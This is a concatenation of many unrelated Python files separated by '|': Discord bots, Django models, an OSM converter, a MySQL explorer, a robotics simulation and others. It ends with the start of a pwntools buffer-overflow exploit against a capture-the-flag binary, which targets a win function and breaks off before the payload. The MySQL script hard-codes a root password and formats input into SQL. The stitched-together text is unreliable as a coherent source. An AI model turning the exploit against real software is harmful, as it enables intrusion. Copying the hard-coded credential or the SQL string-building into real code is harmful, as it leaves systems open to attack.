    #plt.bar(bin_left, bc/bin_width, width=bin_width, alpha=0.5, label='reco')
    plt.bar(bin_left, bc_shift, width=bin_width, alpha=0.5,
            color='red', label='unfolded', yerr=np.sqrt(np.abs(np.diag(cov))), ecolor='r')
    # Keep the y-range symmetric enough to show negative unfolded bins.
    plt.ylim((max(plt.ylim()[0], -plt.ylim()[1]), plt.ylim()[1]))
    plt.legend()
|
# coding:utf-8
'''
Created on 2013-6-11
@author: wolf_m
'''
class ViperClientGroup():
    '''Singleton registry of connected clients, keyed by each client's id.'''

    inst = None  # class-level singleton instance, created lazily by getInstance()

    def __init__(self):
        self.clientMap = {}

    def addClient(self, client):
        '''Register *client*; return it, or None if the id is already taken.'''
        if client.id in self.clientMap:
            return None
        else:
            self.clientMap[client.id] = client
            return client

    def broadcast(self, message):
        '''Send *message* to every registered client (not implemented yet).'''
        pass

    def removeClientById(self, clientId):
        '''Drop the client registered under *clientId* (KeyError if absent).'''
        del self.clientMap[clientId]

    def removeClient(self, client):
        '''Drop *client* by its id (KeyError if absent).'''
        del self.clientMap[client.id]

    def getClientSize(self):
        '''Return the number of registered clients.'''
        return len(self.clientMap)  # len(dict) instead of len(dict.keys())

    @staticmethod
    def getInstance():
        '''Return the shared instance, creating it on first use.'''
        if ViperClientGroup.inst is None:  # identity check, not == None
            ViperClientGroup.inst = ViperClientGroup()
        return ViperClientGroup.inst
|
in_queue = Queue()

def consumer():
    print('Consumer waiting')
    work = in_queue.get()  # completes second
    print('Consumer working')
    # do the work
    # ...
    print('Consumer done')
    in_queue.task_done()  # completes third

Thread(target=consumer).start()

in_queue.put(object())  # completes first
print('Producer waiting')
in_queue.join()  # blocks until task_done() balances the put()
print('Producer done')
>>>
Consumer waiting
Producer waiting
Consumer working
Consumer done
Producer done
|
# Multiplies a factor times all of the elements in a list
number_list = [2, 4, -22, 10, -16, 20, 55]
my_number = 10

# Build the scaled list with a comprehension instead of an explicit loop.
multiplied_list = [value * my_number for value in number_list]

print(multiplied_list)
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 10 21:55:45 2019
@author: yoelr
"""
import numpy as np
from .array import array
__all__ = ('tuple_array',)

# Local aliases for the numpy names used repeatedly below.
ndarray = np.ndarray
asarray = np.asarray
def invalid_method(self, *args, **kwargs):
    """Stand-in for any mutating method on an immutable object: always raises."""
    message = f"'{type(self).__name__}' objects are immutable."
    raise TypeError(message)
class tuple_array(ndarray):
    """Create an array that is immutable and hashable.
    **Parameters**
        **array:** [array_like] Input data, in any form that can be converted to an array. This includes lists, lists of tuples, tuples, tuples of tuples, tuples of lists and ndarrays.
        **dtype:** [data-type] By default, the data-type is inferred from the input data.
        **order:** {'C', 'F'} Whether to use row-major (C-style) or column-major (Fortran-style) memory representation. Defaults to ‘C’.
    **Examples**
        Create a tuple_array object:
        .. code-block:: python
            >>> arr = tuple_array([1, 18])
            tuple_array([1, 18])
        tuple_array objects are immutable:
            >>> arr[1] = 0
            TypeError: 'tuple_array' objects are immutable.
        tuple_array objects are hashable:
            >>> hash(arr)
            3713080549427813581
    """
    __slots__ = ()  # no per-instance __dict__; nothing beyond the ndarray buffer
    def __new__(cls, arr, dtype=np.float64, order='C'):
        # View (not copy, when possible) the converted input as this class.
        self = asarray(arr, dtype, order).view(cls)
        return self
    def __hash__(self):
        # Hash by element values, matching equality of the flattened contents.
        return hash((tuple(self)))
    def __setitem__(self, key, val):
        raise TypeError(f"'{type(self).__name__}' objects are immutable.")
    def __array_wrap__(self, out_arr):
        # New array should not be a tuple_array
        # NOTE(review): newer NumPy passes extra args (context, return_scalar)
        # to __array_wrap__ -- confirm this signature against the pinned version.
        if self is not out_arr: out_arr.__class__ = array
        return out_arr
    __repr__ = array.__repr__
    # All in-place operators are disabled, since the array is immutable.
    __iadd__ = __isub__ = __imul__ = __imatmul__ = __itruediv__ = __idiv__ = __ifloordiv__ = __imod__ = __ipow__ = __ilshift__ = __irshift__ = __iand__ = __ixor__ = __ior__ = invalid_method
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 24 10:05:56 2018
@author: Jun Wang
"""
import xml.etree.cElementTree as ET
# import pprint
import re
import codecs
import json
from audit import update_name
# Tag-key classifiers used while auditing OSM tags.
lower = re.compile(r'^([a-z]|_)*$')  # plain lowercase keys
lower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')  # namespaced keys (addr:street)
problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]')  # keys to skip entirely

# Attribute names collected into the 'created' sub-document.
CREATED = [ "version", "changeset", "timestamp", "user", "uid"]

# Canonical replacements for inconsistently spelled point-of-interest names.
changes = {u'中国农业银行': u'农业银行',
           u'中国工商银行': u'工商银行',
           u'中国建设银行': u'建设银行',
           u'中国民生银行': u'民生银行',
           "McDonald's": u'麦当劳',
           'McDonald': u'麦当劳',
           'McDonalds': u'麦当劳',
           u"金拱门 麥當勞 Mc'Donald": u'麦当劳',
           'Pizza Hut': u'必胜客',
           'KFC': u'肯德基',
           'Subway': u'赛百味'}

# UPDATE THIS VARIABLE
# Abbreviation/pinyin -> full English word expansions used by update_name().
mapping = { "St": "Street",
            "St.": "Street",
            "Rd": "Road",
            "Rd.": "Road",
            "road": "Road",
            "Ave": "Avenue",
            "Ave.": "Avenue",
            "ave": "Avenue",
            "Sheng": "Province",
            "Shi": "City",
            "Qu": "District",
            "Lu": "Road",
            "Jie": "Street",
            "Dong": "East",
            "Xi": "West",
            "Nan": "South",
            "Bei": "North",
            "N": "North",
            "S": "South",
            "E": "East",
            "W": "West"
            }
def shape_element(element):
    """Shape an OSM 'node'/'way' XML element into a JSON-ready dict.

    Returns None for any other tag.  Collects the fixed CREATED attributes,
    the position (when present), child 'nd' refs, one-level 'addr:*' tags,
    and cleaned names; values run through update_name() with the module
    mapping, and names are first canonicalised via the changes table.
    """
    node = {}
    if element.tag == "node" or element.tag == "way":
        created = {}
        node_refs = []
        attrib = element.attrib
        for field in CREATED:
            created[field] = attrib[field]
        node['created'] = created
        if 'lat' in attrib:
            node['pos'] = [float(attrib['lat']), float(attrib['lon'])]
        node['type'] = element.tag
        if 'visible' in attrib:
            node['visible'] = attrib['visible']
        node['id'] = attrib['id']
        # list(element) replaces Element.getchildren(), removed in Python 3.9.
        children = list(element)
        if len(children):
            address = {}
            for elem in children:
                if elem.tag == 'nd':
                    node_refs.append(elem.attrib['ref'])
                    node['node_refs'] = node_refs
                if elem.tag == 'tag':
                    k = elem.attrib['k']
                    v = elem.attrib['v']
                    # Skip keys containing problematic characters entirely.
                    if not len(re.findall(problemchars, k)):
                        addr_k = re.findall(re.compile(r'^addr\:(\D+)'), k)
                        if len(addr_k):
                            # Only keep single-level addr keys (addr:street,
                            # not addr:street:name).
                            addr_k = addr_k[0].split(':')
                            if len(addr_k) == 1:
                                better_v = update_name(v, mapping)
                                address[addr_k[0]] = better_v
                                node['address'] = address
                        elif k.find(':') == -1 and k == 'name':
                            # Canonicalise known name variants before cleanup.
                            if v in changes:
                                v = changes[v]
                            node[k] = update_name(v, mapping)
                        elif k.find(':') == -1:
                            node[k] = v
        return node
    else:
        return None
def process_map(file_in, pretty = False):
    """Stream-parse *file_in* (OSM XML) and write shaped docs to <file_in>.json.

    Returns the list of shaped documents.  Prints a running element count
    as a progress indicator.
    """
    file_out = "{0}.json".format(file_in)
    data = []
    counter = 0 #added counter to show status when creating json file
    with codecs.open(file_out, "w") as fo:
        for _, element in ET.iterparse(file_in):
            el = shape_element(element)
            counter += 1
            print(counter)  # parenthesized: was a Python-2-only print statement
            if el:
                data.append(el)
                if pretty:
                    fo.write(json.dumps(el, indent=2)+"\n")
                else:
                    fo.write(json.dumps(el) + "\n")
    return data
def test():
    """Run the converter on the sample extract with pretty-printed output."""
    data = process_map('map_sample.osm', True)
    #pprint.pprint(data)

if __name__ == "__main__":
    test()
|
# Single import line replaces the original duplicate `path` imports.
from django.urls import path, include

from . import views

urlpatterns = [
    # Product grid listing page.
    path('product-grid/', views.products_grid, name='products_grid'),
]
#!/usr/bin/env python3
import asyncio
import json
import logging
import random
import string
import threading
import discord
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class TimerClass(threading.Thread):
    """Daemon thread driving the aidsfest queue.

    run() blocks on an Event; stop() sets the event, which makes run()
    schedule bot.aidsfest_next_in_line() on the asyncio loop and then clear
    the event again.  NOTE(review): stop() therefore means "advance the
    queue now", not "halt the thread" -- confirm the naming is intended.
    """
    def __init__(self, bot):
        threading.Thread.__init__(self)
        self.daemon = True  # don't keep the interpreter alive on shutdown
        self.event = threading.Event()
        self.count = 10  # NOTE(review): never read in this class -- confirm before removing
        self.bot = bot
    def run(self):
        while True:
            # Poll every 45s until the event is set by stop().
            while not self.event.is_set():
                self.event.wait(45)
            # Hand the coroutine to the bot's asyncio loop.
            cmd = self.bot.aidsfest_next_in_line()
            asyncio.ensure_future(cmd)
            log.info('Restarting timer')
            self.event.clear()
    def stop(self):
        """Wake the timer, triggering one queue advance."""
        self.event.set()
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random identifier of *size* characters drawn from *chars*.

    Uses SystemRandom (OS entropy), so ids are not reproducible by seeding.
    """
    rng = random.SystemRandom()
    picks = (rng.choice(chars) for _ in range(size))
    return ''.join(picks)
class DiscordBot(discord.Client):
    """Queue-management bot: subscribers !join a queue and are granted the
    "Current Speaker" role one at a time in a dedicated text channel.

    NOTE(review): written against the pre-1.0 discord.py API (self.servers,
    send_message, server_voice_state, change_status, ...) -- confirm the
    pinned discord.py version before touching this class.
    """
    def __init__(self):
        super().__init__()
        self.quitting = False
        # Names resolved to live discord objects in on_ready().
        self.server_name = 'NymN'
        self.sub_role_name = 'Twitch Subscriber'
        self.current_speaker_role_name = 'Current Speaker'
        self.moderator_role_names = ['Moderator', 'Roleplayer']
        self.aidsfest_text_channel_name = 'chemotherapy'
        self.queue_path = '/tmp/aidsfest_queue_nymn'
        self.aidsfest_queue = []  # user ids, FIFO order
        self.load_queue()
    async def quit(self):
        """Flag shutdown and close the gateway connection."""
        self.quitting = True
        await self.close()
    def get_server(self, server_name):
        """Return the connected server with this name, or None."""
        return discord.utils.find(lambda server: server.name == server_name, self.servers)
    def get_role(self, role_name):
        """Return the main server's role with this name, or None."""
        return discord.utils.find(lambda role: role.name == role_name, self.main_server.roles)
    def get_text_channel(self, channel_name):
        """Return the main server's channel with this name, or None."""
        return discord.utils.find(lambda channel: channel.name == channel_name, self.main_server.channels)
    def is_member_subscriber(self, member):
        """True if *member* carries the Twitch-subscriber role."""
        for role in member.roles:
            if role.id == self.sub_role.id:
                return True
        return False
    def get_member(self, user_id):
        """Return the main-server member with this id, or None."""
        return discord.utils.find(lambda m: m.id == user_id, self.main_server.members)
    async def on_message(self, message):
        """Route per-channel commands first, then moderator-only ! commands."""
        log.info('{0}: {1}'.format(message.author.name, message.content))
        channel_id = message.channel.id if message.channel.is_private is False else 'private'
        # channel = message.channel
        chan = self.channels.get(channel_id, None)
        if chan is None:
            # Fall back to commands allowed in any channel.
            chan = self.channels.get('any', None)
        if chan:
            commands = chan.get('commands', {})
            delete_commands = chan.get('delete_commands', False)
            command = commands.get(message.content, None)
            if command is not None:
                cmd = command(message)
                asyncio.ensure_future(cmd)
                if delete_commands:
                    await self.delete_message(message)
                return True
        # Everything below is moderator-only.
        is_moderator = False
        try:
            for role in message.author.roles:
                if role in self.moderator_roles:
                    is_moderator = True
                    break
        except:
            # Authors of private messages have no roles attribute.
            pass
        if is_moderator is False:
            return False
        if message.content.startswith('!ping'):
            await self.send_message(message.channel, 'Pong!')
        elif message.content.startswith('!next'):
            await self.command_aidsfest_next(message)
        elif message.content.startswith('!chaninfo'):
            await self.send_message(message.channel, 'Current channel:\n**Name:** {0.name}\n**ID:** {0.id}'.format(message.channel))
        elif message.content.startswith('!clearchat'):
            # Wipe #announcements except its very first (pinned-style) message.
            correct_channel = discord.utils.find(lambda c: c.name == 'announcements', self.main_server.channels)
            if correct_channel:
                keep_first_message = True
                async for message in self.logs_from(correct_channel, limit=1000):
                    if keep_first_message:
                        keep_first_message = False
                        continue
                    await self.delete_message(message)
        elif message.content.startswith('!myroles'):
            roles_str = '\n'.join(['{0.name} - {0.id}'.format(role) for role in message.author.roles[1:]])
            await self.send_message(message.channel, 'You are part of the following roles:\n{0}'.format(roles_str))
        elif message.content.startswith('!serverroles'):
            roles_str = '\n'.join(['**{0.name}** - ID: **{0.id}**'.format(role) for role in self.main_server.roles[1:]])
            await self.send_message(message.channel, 'Roles on the server:\n{0}'.format(roles_str))
        elif message.content.startswith('!quit'):
            await self.send_message(message.channel, 'Quitting.. Good bye!')
            await self.quit()
        elif message.content.startswith('!info'):
            await self.send_message(message.channel, 'Your user ID is: **{0}**'.format(message.author.id))
    async def on_ready(self):
        """Resolve named discord objects and build the command routing table."""
        print('Logged in as {0} (@{1})'.format(self.user.name, self.user.id))
        game = discord.Game()
        game.name = "BabyRage simulator"
        asyncio.ensure_future(self.change_status(game=game, idle=False))
        for server in self.servers:
            log.info(server)
        self.main_server = self.get_server(self.server_name)
        self.sub_role = self.get_role(self.sub_role_name)
        self.current_speaker_role = self.get_role(self.current_speaker_role_name)
        self.moderator_roles = [self.get_role(role_name) for role_name in self.moderator_role_names]
        self.aidsfest_text_channel = self.get_text_channel(self.aidsfest_text_channel_name)
        log.info(self.aidsfest_text_channel)
        log.info(self.aidsfest_text_channel.id)
        log.info(type(self.aidsfest_text_channel.id))
        # Per-channel command tables; 'private' and 'any' are fallback keys.
        self.channels = {
            self.aidsfest_text_channel.id: {
                'no_chatting': True,
                'commands': {
                    '!join': self.command_aidsfest_join_queue,
                    '!list': self.command_aidsfest_list,
                    '!unmuteall': self.command_unmute_all,
                }
            },
            'private': {
                'commands': {
                    '!join': self.command_aidsfest_join_queue,
                }
            },
            'any': {
                'commands': {
                    '!join': self.command_aidsfest_join_queue,
                }
            },
        }
        self.aidsfest_timer = TimerClass(self)
        self.aidsfest_timer.start()
        # stop() fires an immediate queue advance (see TimerClass).
        self.aidsfest_timer.stop()
    async def get_invitation(self, username, user_id=0):
        """Create and return an invite URL for the main server."""
        print('getting invitation for {0}'.format(username))
        invite = await self.create_invite(self.main_server)
        # invite = self.create_invite(self.main_server, max_age=10)
        if invite:
            return invite.url
    def load_queue(self):
        """Restore the queue from disk; start empty when no saved file exists."""
        try:
            with open(self.queue_path, 'r') as file:
                self.aidsfest_queue = json.load(file)
        except FileNotFoundError:
            self.aidsfest_queue = []
            pass
    def save_queue(self):
        """Persist the queue so it survives restarts."""
        with open(self.queue_path, 'w+') as file:
            json.dump(self.aidsfest_queue, file, ensure_ascii=False)
    async def aidsfest_next_in_line(self):
        """Demote/mute the current speaker, promote and unmute the next in queue."""
        # Remove any "current speaker"
        for member in self.main_server.members:
            for role in member.roles:
                if role == self.current_speaker_role:
                    log.info('Removing {} from the current speaker role'.format(member.name))
                    await self.remove_roles(member, [self.current_speaker_role])
                    await self.server_voice_state(member, mute=True)
        if len(self.aidsfest_queue) > 0:
            user_id = self.aidsfest_queue.pop(0)
            member = self.get_member(user_id)
            if member:
                await self.add_roles(member, [self.current_speaker_role])
                await self.server_voice_state(member, mute=False)
                await self.send_message(self.aidsfest_text_channel, '{0}, you can now talk in the aidsfest channel.'.format(member.mention))
        try:
            if len(self.aidsfest_queue) > 0:
                qsize = len(self.aidsfest_queue)
                next_ppl = self.aidsfest_queue[:3]
                next_ppl_str = ', '.join(['**{0}**'.format(self.get_member(u).name) for u in next_ppl])
                await self.send_message(self.aidsfest_text_channel, 'There are currently **{0}** people in the queue. Next **{1}** in line are: {2}'.format(qsize, len(next_ppl), next_ppl_str))
        except:
            # Best effort: a departed member makes get_member() return None above.
            pass
        self.save_queue()
    async def command_aidsfest_join_queue(self, message):
        """!join -- append the (subscriber) author to the queue once."""
        if message.channel.is_private:
            # DM authors must still be resolvable as main-server members.
            member = self.get_member(message.author.id)
            if member is None:
                return False
        else:
            member = message.author
        if self.is_member_subscriber(member) is False:
            return False
        if message.author.id in self.aidsfest_queue:
            await self.send_message(message.channel, '{0}, you are already in the aidsfest queue at position {1}.'.format(message.author.mention, self.aidsfest_queue.index(message.author.id) + 1))
        else:
            await self.send_message(message.channel, '{0}, you have been placed in the aidsfest queue.'.format(message.author.mention))
            self.aidsfest_queue.append(message.author.id)
            self.save_queue()
    async def command_aidsfest_next(self, message=None):
        """!next -- trigger an immediate queue advance via the timer."""
        self.aidsfest_timer.stop()
    async def command_aidsfest_list(self, message=None):
        """!list -- announce queue size and the next (up to 3) members."""
        if len(self.aidsfest_queue) > 0:
            qsize = len(self.aidsfest_queue)
            next_ppl = self.aidsfest_queue[:3]
            next_ppl_str = ', '.join(['**{0}**'.format(self.get_member(u).name) for u in next_ppl])
            await self.send_message(self.aidsfest_text_channel, 'There are currently **{0}** people in the queue. Next **{1}** in line are: {2}'.format(qsize, len(next_ppl), next_ppl_str))
        else:
            await self.send_message(self.aidsfest_text_channel, 'No one is queued up for aidsfest.')
    async def command_unmute_all(self, message):
        """!unmuteall -- server-unmute every muted, online member (rate-limited)."""
        for member in self.main_server.members:
            if member.mute and not member.status == 'offline':
                log.info(member.status)
                await self.send_message(message.channel, 'Unmuting {}'.format(member.name))
                await self.server_voice_state(member, mute=False)
                # Crude rate-limit between voice-state calls.
                await asyncio.sleep(5)
def run_discord_client():
    """Construct the bot and run it with credentials from config until it dies."""
    from config import DiscordConfig
    client = DiscordBot()
    try:
        client.run(DiscordConfig.EMAIL, DiscordConfig.PASSWORD)
    except KeyboardInterrupt:
        # NOTE(review): quit() is a coroutine; calling it without awaiting it
        # (or scheduling it on a running loop) is a no-op -- confirm intent.
        client.quit()
    except:
        log.exception('BabyRage BabyRage')

if __name__ == '__main__':
    run_discord_client()
|
from django.db import models
from taggit.managers import TaggableManager
from nomadgram.users import models as user_models
#if we import many models we make nickname using 'as~'
# Create your models here.
class TimeStampedModel(models.Model):
    """Abstract base adding creation/update stamps to every subclass.

    NOTE(review): DateField stores only the date, not the time -- confirm
    DateTimeField was not intended for these "timestamps".
    """
    created_at = models.DateField(auto_now_add=True)  # set once on insert
    updated_at = models.DateField(auto_now=True)  # refreshed on every save
    class Meta:
        abstract=True
class Image(TimeStampedModel):
    """ Image Model """
    file = models.ImageField()
    # Reverse accessor: user.images; row survives with creator=NULL semantics
    # handled by null=True even though on_delete cascades.
    creator = models.ForeignKey(user_models.User, null=True,on_delete=models.CASCADE, related_name='images')
    location = models.CharField(max_length=140)
    caption = models.TextField()
    tags=TaggableManager()
    @property
    def like_count(self):
        """Number of Like rows pointing at this image."""
        return self.likes.all().count()
    @property
    def comment_count(self):
        """Number of Comment rows pointing at this image."""
        return self.comments.all().count()
    def __str__(self):
        return '{} - {}'.format(self.location, self.caption)
class Comment(TimeStampedModel):
    """ Comment Model """
    message= models.TextField()
    # Reverse accessors: user.comments and image.comments.
    creator = models.ForeignKey(user_models.User, null=True, on_delete=models.CASCADE,related_name='comments')
    image =models.ForeignKey(Image, on_delete=models.CASCADE, null=True, related_name='comments')
    def __str__(self):
        return 'Image Caption: {}- User: {} - Comment: {} '.format( self.image.caption, self.creator.username, self.message)
class Like(TimeStampedModel):
    """ Like Model """
    # Reverse accessors: user.likes and image.likes (used by Image.like_count).
    creator = models.ForeignKey(user_models.User, null=True,on_delete=models.CASCADE, related_name='likes')
    image =models.ForeignKey(Image, on_delete=models.CASCADE, null=True, related_name='likes')
    def __str__(self):
        return 'User: {} - Image Caption: {}'.format(self.creator.username, self.image.caption)
from lib.chatbot.reaction.reactionBase import ReactionBase
class ReactionDefault(ReactionBase):
    """Fallback reaction used when no specific reaction matches a message."""
    def __init__(self, message, me):
        super().__init__(message, me)
    def response(self):
        """Send the canned fallback reply."""
        text = "Uff, I'm speechless..."
        self._send_message(text)
    def action(self):
        """The default reaction performs no side effects."""
        pass
|
import mysql.connector
# Interactive MySQL explorer: list databases, tables, columns, then dump a table.
# NOTE(review): credentials are hard-coded; move them to config/environment.
host_name = "localhost"
user_name = "root"
pwd = "9866850403"
db_name = ""
con = None
cur = None
try:
    con = mysql.connector.connect(host=host_name, user=user_name, password=pwd, database=db_name)
    cur = con.cursor()
    sql = "show databases"
    cur.execute(sql)
    existing_dbs = cur.fetchall()
    print("Existing databases are as follows: ")
    for row in existing_dbs:
        print(row[0])
    print()
    # NOTE: identifiers cannot be bound as query parameters, so the names
    # below are interpolated with str.format -- acceptable only because the
    # input is typed interactively by the operator, not untrusted callers.
    db_name = (input("Enter a database name from the list to fetch tables: ")).lower()
    sql2 = ("use {}".format(db_name))
    cur.execute(sql2)
    print("'{}' database selected".format(db_name))
    sql3 = "show tables"
    cur.execute(sql3)
    table_list = cur.fetchall()
    print("Tables list in the database that you've selected '{}' are as follows:".format(db_name))
    for row in table_list:
        print(row[0])
    print()
    get_table_proprties = input("Enter a table name to get properties: ").lower()
    sql4 = ("describe {}".format(get_table_proprties))
    cur.execute(sql4)
    get_table_proprties_op = cur.fetchall()
    for row in get_table_proprties_op:
        print(row[0], row[1], row[2])
    print()
    table_name = input("Enter a table name to get details: ").lower()
    sql5 = ("select * from {}".format(table_name))
    cur.execute(sql5)
    table_data = cur.fetchall()
    for row in table_data:
        print("%5s %30s %15s %15s" % (row[0], row[1], row[2], row[3]))
except mysql.connector.Error as err:
    print(err)
finally:
    # Close resources on every path -- the original only closed on success,
    # leaking the cursor and connection after any query error.
    if cur is not None:
        cur.close()
    if con is not None:
        con.close()
|
#/bin/python
from pyb import *
from time import sleep

# Triangle-wave fade on LED 1: ramp intensity 0->50 then 50->0, forever.
led1 = LED(1)
led2 = LED(2)  # NOTE(review): constructed but never driven below -- confirm it is needed
brightness = 0  # dead stores `x = 0` and `brightness = 100` removed

while True:
    for count in range(50):
        led1.intensity(brightness)
        brightness += 1
        sleep(0.05)
    for count in range(50):
        led1.intensity(brightness)
        brightness -= 1
        sleep(0.05)
|
from django.conf.urls import url
from . import views
# Every route now carries a name= so templates/views can reverse() it;
# the first two were unnamed while the last two were named (inconsistent).
urlpatterns = [
    url(r'^$', views.listar_publicaciones, name='listar_publicaciones'),
    url(r'^post/(?P<pk>[0-9]+)/$', views.detalle_publicacion, name='detalle_publicacion'),
    url(r'^post/new/$', views.nueva_publicacion, name='nueva_publicacion'),
    url(r'^post/(?P<pk>[0-9]+)/edit/$', views.post_editar, name='post_editar'),
]
|
import discord
from discord.ext import commands
import json
import os
from classes import Guild
import database as db
from env import TOKEN
from vars import bot, extensions, get_prefix
@bot.event
async def on_ready():
    """Initial function to run when the bot is ready to function."""
    await bot.change_presence(
        activity=discord.Activity(type=discord.ActivityType.playing,
                                  name="@Pandora's Bot for help"))
    print("Generating Objects...")
    # collect new guild ids and create objects for them
    new_ids = {guild.id for guild in bot.guilds} - set(Guild._guilds.keys())
    # Create new Guild objects
    new_guilds = [Guild(id) for id in new_ids]
    print("Updating database...")
    db.update(*new_guilds)
    print("Ready Player One.")
@bot.event
async def on_message(message):
    """Message listener."""
    # Ignore the bot's own messages to avoid feedback loops.
    if message.author == bot.user:
        return
    await bot.process_commands(message)  # dispatches the message if it is a command
@bot.event
async def on_guild_join(guild):
    """Bot joined a new server: create and persist its Guild record."""
    # Rebinding shadows the discord guild with the project's Guild wrapper.
    guild = Guild(guild.id)
    db.update(guild)
@bot.event
async def on_guild_remove(guild):
    """Bot was removed from a server: drop the cached object and its DB row."""
    # NOTE(review): assumes Guild exposes a dict-like class-level pop -- confirm.
    Guild.pop(guild.id, None)
    # remove from DB
    db.delete_guild(guild.id)
# loads extensions(cogs) listed in vars.py
if __name__ == '__main__':
    for extension in extensions:
        try:
            bot.load_extension(extension)
        except Exception as e:
            # A failed cog shouldn't prevent the rest from loading.
            print(f"Couldn't load {extension}")
            print(e)
    bot.run(TOKEN)  # runs the bot (blocking)
|
#!/usr/bin/python3
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
PATH = "https://raw.githubusercontent.com/hyeonukbhin/homework3_NA/master/assets/data/"
FILENAME = "647_Global_Temperature_Data_File.txt"
TITLE = "Global Temperature"
X_LABEL = "YEAR"
Y_LABEL = "Temperature Anomaly (C)"
SAVE_FILENAME = "assets/images/global_warming.png"

# Three whitespace-separated columns, no header row in the source file.
coll_name = ["Year", "1-year Mean", "5-year Mean"]
# sep=r"\s+" replaces delimiter="\s+": raw string avoids the invalid
# escape-sequence warning, and sep is the canonical parameter name.
df = pd.read_csv(PATH + FILENAME, sep=r"\s+", header=None)
df.columns = coll_name
x = df[coll_name[0]]
y1 = df[coll_name[1]]
y2 = df[coll_name[2]]

fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(8, 5))
# Annual means: dash-dot blue with open markers; 5-year means: heavy black line.
ax.plot(x, y1, c="blue", ls="-.", marker="o", ms="4", mec="blue", mfc="white", label=coll_name[1])
ax.plot(x, y2, c="black", ls="-", lw="5", label=coll_name[2])
plt.xticks(np.arange(1880, 2030, 10))
plt.yticks(np.arange(-0.5, 1.5, 0.5))
ax.legend()
ax.set_title(TITLE, fontsize=20)
ax.set_xlabel(X_LABEL, fontsize=14)
ax.set_ylabel(Y_LABEL, fontsize=14)
ax.grid(c="gray", ls="-", lw=2)
fig.savefig(SAVE_FILENAME)
plt.show()
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 6 15:27:04 2016
@author: alex
"""
from AlexRobotics.dynamic import Prototypes as Proto
from AlexRobotics.control import RolloutComputedTorque as RollCTC
import numpy as np
# The controller's internal model (R_ctl) deliberately differs from the
# simulated plant (R) -- e.g. in load mass -- to exercise robustness to
# model error.
R_ctl = Proto.SingleRevoluteDSDM()
R = Proto.SingleRevoluteDSDM()

# Load mass
R.M = 0.2
R_ctl.M = 0.3
R_ctl.ext_cst_force = 0

# Assign controller
Ctl = RollCTC.RolloutSlidingModeController( R_ctl )
R.ctl = Ctl.ctl

# Sliding-mode / rollout controller tuning.
Ctl.n_gears = 2
Ctl.w0 = 1.0
Ctl.lam = 1.0
Ctl.nab = 1.0
Ctl.D = 2
Ctl.hysteresis = True
Ctl.min_delay = 0.5
Ctl.goal = np.array([0,0])
# Keep the inner fixed controller consistent with the outer tuning.
Ctl.FixCtl.lam = Ctl.lam
Ctl.FixCtl.nab = Ctl.nab
Ctl.FixCtl.D = Ctl.D
Ctl.horizon = 0.5
Ctl.domain_check = False

# Max torque
R_ctl.u_ub = np.array([+10,500])
R_ctl.u_lb = np.array([-10,0])

""" Simulation and plotting """

# Ploting a trajectory
x_start = np.array([-6,0])
tf = 10
dt = 0.01
n = int( tf / dt ) + 1
R.computeSim( x_start , tf , n , solver = 'euler' )
R.animateSim()
R.Sim.plot_CL()

# Disturbance-sweep experiment kept for reference (disabled):
#
#Disturbances_Bounds = np.array([0,1,5,10])
#
#
#for D in Disturbances_Bounds:
#
#    Ctl.FixCtl.D = D
#
#    Ctl.reset_hysteresis()
#
#    R.computeSim( x_start , tf , n , solver = 'euler' )
#
#    R.Sim.plot_CL()
#
#    R.Sim.fig.canvas.set_window_title('D = ' + str(D) )
#    R.Sim.plots[3].set_ylim( 0 , 15 )
#    R.Sim.plots[3].set_yticks( [ 1 , 10 ] )
#
|
import os
import random
import string
import wave
import logging
from handlers.base import BaseHandler
from recognizer import speech
logger = logging.getLogger(__name__)
def get_path(filename):
    """Return *filename* anchored under the configured upload directory."""
    # Imported lazily so settings are read at call time, not module load.
    from settings import UPLOAD_ROOT
    upload_dir = UPLOAD_ROOT
    return os.path.join(upload_dir, filename)
class UploadHandler(BaseHandler):
    """Accepts a WAV upload, stores it under a random name, and returns the
    recognized transcript."""
    def post(self):
        """Handle a multipart upload in form field 'file1'."""
        file1 = self.request.files['file1'][0]
        original_fname = file1['filename']
        extension = os.path.splitext(original_fname)[1]
        # Random 6-char name avoids collisions and untrusted user filenames.
        # NOTE(review): random.choice is not cryptographically secure; use
        # secrets.choice if the names must be unguessable.
        chars = string.ascii_lowercase + string.digits
        fname = ''.join(random.choice(chars) for x in range(6)) + extension
        file_path = get_path(fname)
        with open(file_path, 'wb') as f:
            f.write(file1['body'])
        # Log basic WAV parameters for debugging before recognition.
        with wave.open(file_path, 'r') as w:
            logger.info("***** WAV INFO *****")
            logger.info(w.getparams())
        transcript = speech.listen(file_path)
        self.finish(transcript)
|
import os
from setuptools import setup, find_packages
version = '0.0.1'

# Long description is the README contents plus a trailing blank line.
README = os.path.join(os.path.dirname(__file__), 'README.rst')
long_description = open(README).read() + '\n\n'

if __name__ == '__main__':
    # NOTE(review): the url/author metadata appears copied from the 'potpy'
    # project -- confirm it is intended for the 'todo' package.
    setup(
        name='todo',
        version=version,
        description=(''),
        long_description=long_description,
        author='David Zuwenden',
        author_email='dhain@zognot.org',
        url='https://github.com/dhain/potpy',
        license='MIT',
        classifiers=[
            "Intended Audience :: Developers",
            "License :: OSI Approved :: MIT License",
            "Programming Language :: Python",
            "Topic :: Software Development :: Libraries :: Python Modules",
        ],
        packages=find_packages(),
        test_suite='todo.test',
        tests_require=['mock', 'wsgi_intercept', 'pastedeploy'],
        install_requires=['potpy', 'webob'],
        entry_points={
            'paste.app_factory': [
                'main=todo.app_factory:factory',
            ],
        }
    )
|
# +------------------------------------------------+
# | Atack: Bof Win Function |
# +------------------------------------------------+
#
# Buffer-overflow exploit: overflows a stack buffer to overwrite the saved
# return address so execution lands in the binary's "win" function.
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/05-bof_callfunction
from pwn import *
import sf
# Launch the vulnerable 32-bit binary and attach gdb for live inspection.
target = process("./chall-test_utc-pwn2")
gdb.attach(target)
# Build the payload: 0x3c presumably is the offset from the input buffer to
# the saved return address (TODO confirm against the sf library docs), which
# is then overwritten with 0x8049256 — per the header, the win function.
